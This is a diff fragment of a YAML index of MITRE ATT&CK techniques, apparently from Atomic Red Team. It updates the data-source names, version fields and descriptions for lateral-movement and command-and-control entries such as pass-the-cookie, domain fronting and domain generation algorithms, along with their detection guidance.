x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: false x_mitre_defense_bypassed: - System Access Controls @@ -58617,13 +62049,16 @@ lateral-movement: user has an active login session but has not entered the building or does not have VPN access).' x_mitre_data_sources: - - Office 365 audit logs - - OAuth audit logs - - Authentication logs + - 'Logon Session: Logon Session Creation' + - 'Web Credential: Web Credential Usage' + - 'Application Log: Application Log Content' + - 'User Account: User Account Authentication' + - 'Active Directory: Active Directory Credential Request' x_mitre_platforms: - Windows - Office 365 - SaaS + - Google Workspace atomic_tests: [] T1021.005: technique: @@ -58652,9 +62087,9 @@ lateral-movement: x_mitre_system_requirements: - VNC server installed and listening for connections. x_mitre_data_sources: - - Process use of network - - Network protocol analysis - - Netflow/Enclave netflow + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' + - 'Logon Session: Logon Session Creation' x_mitre_detection: Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior @@ -58681,7 +62116,7 @@ lateral-movement: source_name: Pass The Cookie - source_name: Unit 42 Mac Crypto Cookies January 2019 url: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/ - description: Chen, Y., Hu, W., Xu, Z., et. al.. (2019, January 31). Mac Malware + description: Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 @@ -58690,7 +62125,7 @@ lateral-movement: description: |- Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie) - Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform. + Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform. There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019) id: attack-pattern--c3c8c916-2f3c-4e71-94b2-240bdfc996f0 @@ -58700,9 +62135,9 @@ lateral-movement: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-09-16T19:40:44.527Z' + modified: '2021-04-14T13:21:37.474Z' created: '2020-01-30T17:48:49.395Z' - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_defense_bypassed: - System Access Controls @@ -58710,13 +62145,14 @@ lateral-movement: applications by the same user in different locations or by different systems that do not match expected configurations. x_mitre_data_sources: - - Office 365 audit logs - - Authentication logs + - 'Web Credential: Web Credential Usage' + - 'Application Log: Application Log Content' x_mitre_contributors: - Johann Rehberger x_mitre_platforms: - Office 365 - SaaS + - Google Workspace atomic_tests: [] T1021.006: technique: @@ -58764,11 +62200,10 @@ lateral-movement: - User - Administrator x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Netflow/Enclave netflow - - Authentication logs - - File monitoring + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' + - 'Logon Session: Logon Session Creation' + - 'Command: Command Execution' identifier: T1021.006 atomic_tests: - name: Enable Windows Remote Management @@ -58844,16 +62279,15 @@ lateral-movement: command-and-control: T1071: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1071 - url: https://attack.mitre.org/techniques/T1071 - - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf - description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command - & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. - source_name: University of Birmingham C2 + created: '2017-05-31T21:30:56.776Z' + modified: '2020-10-21T16:35:45.986Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + id: attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Application Layer Protocol description: "Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will @@ -58862,23 +62296,22 @@ command-and-control: transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. " - name: Application Layer Protocol - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-10-21T16:35:45.986Z' - created: '2017-05-31T21:30:56.776Z' - x_mitre_version: '2.0' - x_mitre_data_sources: - - DNS records - - Network protocol analysis - - Packet capture - - Netflow/Enclave netflow - - Process use of network - - Process monitoring + external_references: + - source_name: mitre-attack + external_id: T1071 + url: https://attack.mitre.org/techniques/T1071 + - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf + description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command + & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. + source_name: University of Birmingham C2 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_network_requirements: true x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have @@ -58886,26 +62319,18 @@ command-and-control: layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)' - x_mitre_network_requirements: true - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_is_subtechnique: false + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + x_mitre_version: '2.0' atomic_tests: [] T1573.002: technique: - created: '2020-03-16T15:48:33.882Z' - modified: '2020-03-30T00:37:16.593Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - type: attack-pattern id: attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada description: |- Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal. - For efficiency, may protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002). + For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002). name: Asymmetric Cryptography created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: @@ -58926,16 +62351,18 @@ command-and-control: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + modified: '2021-04-20T19:27:46.484Z' + created: '2020-03-16T15:48:33.882Z' x_mitre_platforms: - Linux - macOS - Windows x_mitre_data_sources: - - Process monitoring - - Process use of network - - Malware reverse engineering - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Traffic Content' x_mitre_detection: |- SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks) @@ -58945,13 +62372,18 @@ command-and-control: atomic_tests: [] T1102.002: technique: - created: '2020-03-14T22:34:03.024Z' - modified: '2020-03-26T23:15:47.861Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - type: attack-pattern - id: attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4 + external_references: + - source_name: mitre-attack + external_id: T1102.002 + url: https://attack.mitre.org/techniques/T1102/002 + - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf + description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command + & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. + source_name: University of Birmingham C2 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Bidirectional Communication description: "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular @@ -58967,28 +62399,17 @@ command-and-control: Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. " - name: Bidirectional Communication - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1102.002 - url: https://attack.mitre.org/techniques/T1102/002 - - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf - description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command - & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. - source_name: University of Birmingham C2 - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_data_sources: - - Host network interface - - Netflow/Enclave netflow - - Network protocol analysis - - Packet capture - - SSL/TLS inspection + id: attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + modified: '2020-03-26T23:15:47.861Z' + created: '2020-03-14T22:34:03.024Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User x_mitre_detection: 'Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and @@ -58997,10 +62418,14 @@ command-and-control: for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)' - x_mitre_permissions_required: - - User - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Connection Creation' + x_mitre_platforms: + - Linux + - macOS + - Windows atomic_tests: [] T1043: technique: @@ -59035,11 +62460,6 @@ command-and-control: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e x_mitre_version: '1.0' - x_mitre_data_sources: - - Packet capture - - Netflow/Enclave netflow - - Process use of network - - Process monitoring x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have @@ -59088,8 +62508,8 @@ command-and-control: x_mitre_detection: Monitor file access on removable media. Detect processes that execute when removable media is mounted. x_mitre_data_sources: - - File monitoring - - Data loss prevention + - 'Drive: Drive Creation' + - 'Drive: Drive Access' x_mitre_version: '1.0' atomic_tests: [] T1071.004: @@ -59142,11 +62562,8 @@ command-and-control: Monitor for DNS traffic to/from known-bad or suspicious domains. x_mitre_data_sources: - - Netflow/Enclave netflow - - DNS records - - Process monitoring - - Process use of network - - Packet capture + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: - Linux - macOS @@ -59311,7 +62728,7 @@ command-and-control: modified: '2020-03-27T20:54:28.287Z' created: '2020-03-11T14:56:34.154Z' x_mitre_data_sources: - - DNS records + - 'Network Traffic: Network Traffic Content' x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_detection: Detection for this technique is difficult because it would @@ -59367,10 +62784,7 @@ command-and-control: - User x_mitre_network_requirements: true x_mitre_data_sources: - - Packet capture - - Process use of network - - Process monitoring - - Network protocol analysis + - 'Network Traffic: Network Traffic Content' x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have @@ -59422,10 +62836,7 @@ command-and-control: that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)' x_mitre_data_sources: - - Packet capture - - Process use of network - - Process monitoring - - Network protocol analysis + - 'Network Traffic: Network Traffic Content' x_mitre_version: '1.1' atomic_tests: [] T1102.001: @@ -59460,11 +62871,8 @@ command-and-control: - macOS - Windows x_mitre_data_sources: - - Host network interface - - Netflow/Enclave netflow - - Network protocol analysis - - Packet capture - - SSL/TLS inspection + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' x_mitre_detection: 'Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and @@ -59479,6 +62887,21 @@ command-and-control: atomic_tests: [] T1090.004: technique: + created: '2020-03-14T23:29:19.581Z' + modified: '2020-09-16T19:30:54.226Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + id: attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2 + description: |- + Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored). + + For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y. + name: Domain Fronting + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1090.004 @@ -59492,39 +62915,40 @@ command-and-control: Retrieved November 20, 2017. source_name: Fifield Blocking Resistent Communication through domain fronting 2015 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Domain Fronting - description: |- - Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, "domainless" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored). - - For example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y. - id: attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-09-16T19:30:54.226Z' - created: '2020-03-14T23:29:19.581Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_detection: 'If SSL inspection is in place or the traffic is not encrypted, - the Host field of the HTTP header can be checked if it matches the HTTPS SNI - or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking - Resistent Communication through domain fronting 2015)' - x_mitre_data_sources: - - SSL/TLS inspection - - Packet capture - x_mitre_contributors: - - Matt Kelly, @breakersall x_mitre_platforms: - Linux - macOS - Windows + x_mitre_contributors: + - Matt Kelly, @breakersall + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Content' + x_mitre_detection: 'If SSL inspection is in place or the traffic is not encrypted, + the Host field of the HTTP header can be checked if it matches the HTTPS SNI + or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking + Resistent Communication through domain fronting 2015)' + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' atomic_tests: [] T1568.002: technique: + created: '2020-03-10T17:44:59.787Z' + modified: '2020-11-10T18:28:57.002Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd + description: |- + Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019) + + DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation) + + Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity) + name: Domain Generation Algorithms + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1568.002 @@ -59566,50 +62990,30 @@ command-and-control: description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically Generated Domains Using Data Visualization and N-Grams Methods . Retrieved April 26, 2019. - - source_name: Endgame Predicting DGA + - source_name: Elastic Predicting DGA url: https://arxiv.org/pdf/1611.00791.pdf description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November 2). Predicting Domain Generation Algorithms with Long Short-Term Memory Networks. Retrieved April 26, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Domain Generation Algorithms - description: |- - Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019) - - DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation) - - Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity) - id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-10-02T01:37:39.618Z' - created: '2020-03-10T17:44:59.787Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - x_mitre_detection: |- - Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains. - - Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA) - x_mitre_data_sources: - - DNS records - - Netflow/Enclave netflow - - Network device logs - - Packet capture - - Process use of network - x_mitre_contributors: - - Ryan Benson, Exabeam - - Barry Shteiman, Exabeam - - Sylvain Gil, Exabeam x_mitre_platforms: - Linux - macOS - Windows + x_mitre_contributors: + - Ryan Benson, Exabeam + - Barry Shteiman, Exabeam + - Sylvain Gil, Exabeam + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' + x_mitre_detection: |- + Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains. + + Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA) + x_mitre_permissions_required: + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' atomic_tests: [] T1568: technique: @@ -59661,9 +63065,9 @@ command-and-control: another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.' x_mitre_data_sources: - - SSL/TLS inspection - - Web logs - - DNS records + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' x_mitre_version: '1.0' x_mitre_is_subtechnique: false x_mitre_permissions_required: @@ -59675,12 +63079,6 @@ command-and-control: atomic_tests: [] T1573: technique: - created: '2020-03-16T15:33:01.739Z' - modified: '2020-03-30T00:37:16.809Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - type: attack-pattern external_references: - source_name: mitre-attack external_id: T1573 @@ -59707,6 +63105,12 @@ command-and-control: these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files. id: attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + modified: '2021-04-20T19:27:46.650Z' + created: '2020-03-16T15:33:01.739Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: false x_mitre_detection: |- @@ -59714,12 +63118,7 @@ command-and-control: In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) x_mitre_data_sources: - - SSL/TLS inspection - - Process monitoring - - Process use of network - - Malware reverse engineering - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: - Linux - macOS @@ -59799,11 +63198,9 @@ command-and-control: - macOS - Windows x_mitre_data_sources: - - Process use of network - - Process monitoring - - Network protocol analysis - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' x_mitre_detection: 'Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external server. Processes utilizing the network that do not normally have network communication @@ -59815,8 +63212,18 @@ command-and-control: atomic_tests: [] T1008: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2017-05-31T21:30:21.689Z' + modified: '2020-07-14T19:49:47.340Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + id: attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Fallback Channels + description: Adversaries may use fallback or alternate communication channels + if the primary channel is compromised or inaccessible in order to maintain + reliable command and control and to avoid data transfer thresholds. external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1008 @@ -59825,37 +63232,24 @@ command-and-control: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - description: Adversaries may use fallback or alternate communication channels - if the primary channel is compromised or inaccessible in order to maintain - reliable command and control and to avoid data transfer thresholds. - name: Fallback Channels - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-07-14T19:49:47.340Z' - created: '2017-05-31T21:30:21.689Z' - x_mitre_is_subtechnique: false - x_mitre_version: '1.0' - x_mitre_data_sources: - - Malware reverse engineering - - Netflow/Enclave netflow - - Packet capture - - Process monitoring - - Process use of network + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_platforms: + - Linux + - Windows + - macOS + x_mitre_network_requirements: true x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)' - x_mitre_network_requirements: true - x_mitre_platforms: - - Linux - - Windows - - macOS + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false atomic_tests: [] T1568.001: technique: @@ -59900,7 +63294,8 @@ command-and-control: x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_data_sources: - - DNS records + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' x_mitre_platforms: - Linux - macOS @@ -59908,18 +63303,13 @@ command-and-control: atomic_tests: [] T1071.002: technique: - external_references: - - source_name: mitre-attack - external_id: T1071.002 - url: https://attack.mitre.org/techniques/T1071/002 - - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf - description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command - & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. - source_name: University of Birmingham C2 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: File Transfer Protocols + created: '2020-03-15T16:16:25.763Z' + modified: '2020-08-21T14:41:22.911Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + id: attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b description: "Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often @@ -59930,31 +63320,33 @@ command-and-control: Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. " - id: attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-08-21T14:41:22.911Z' - created: '2020-03-15T16:16:25.763Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true + name: File Transfer Protocols + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1071.002 + url: https://attack.mitre.org/techniques/T1071/002 + - url: 